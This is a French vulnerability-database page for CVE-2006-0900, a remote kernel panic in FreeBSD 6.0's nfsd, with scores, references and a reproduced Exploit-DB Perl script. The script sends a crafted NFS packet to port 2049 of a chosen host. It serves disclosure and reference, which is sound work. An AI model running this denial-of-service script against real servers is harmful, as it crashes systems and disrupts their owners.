CVE-2006-0900 : Détail

CVE-2006-0900

96.25%V3
Network
2006-02-27
18h00 +00:00
2017-07-19
13h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

nfsd in FreeBSD 6.0 kernel allows remote attackers to cause a denial of service via a crafted NFS mount request, as demonstrated by the ProtoVer NFS test suite.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.8 AV:N/AC:L/Au:N/C:N/I:N/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 1540

Date de publication : 2006-02-27 23h00 +00:00
Auteur : Evgeny Legerov
EDB Vérifié : Yes

#!/usr/bin/perl ## Saw an advisory on Dailydave and wrote a little script to ## check my freebsd boxes (kind of evil). /str0ke (milw0rm.com) ## ## ProtoVer NFS testsuite 1.0 uncovered remote kernel panic vulnerability in FreeBSD 6.0 kernel. ## Evgeny Legerov ## www.gleg.net use IO::Socket; sub usage { print "FreeBSD 6.0 (nfsd) Remote Kernel Panic Denial of Service Exploit\n"; print "Advisory from Evgeny Legerov (www.gleg.net)\n"; print "Code by str0ke (milw0rm.com)\n"; print "Usage: $0 www.example.com\n"; exit (); } my $host = shift || &usage; my $printer = "\x80\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00" . "\x00\x00\x00\x02\x00\x01\x86\xa5\x00\x00\x00\x01" . "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00" . "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04" . "\x2f\x74\x6d\x70"; $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "2049") || die "\n+ Connection failed...\n"; print $socket $printer . "\n"; # milw0rm.com [2006-02-28]

Products Mentioned

Configuraton 0

Freebsd>>Freebsd >> Version 6.0

Références

http://www.osvdb.org/23511
Tags : vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/bid/16838
Tags : vdb-entry, x_refsource_BID
http://secunia.com/advisories/19017
Tags : third-party-advisory, x_refsource_SECUNIA
http://securityreason.com/securityalert/521
Tags : third-party-advisory, x_refsource_SREASON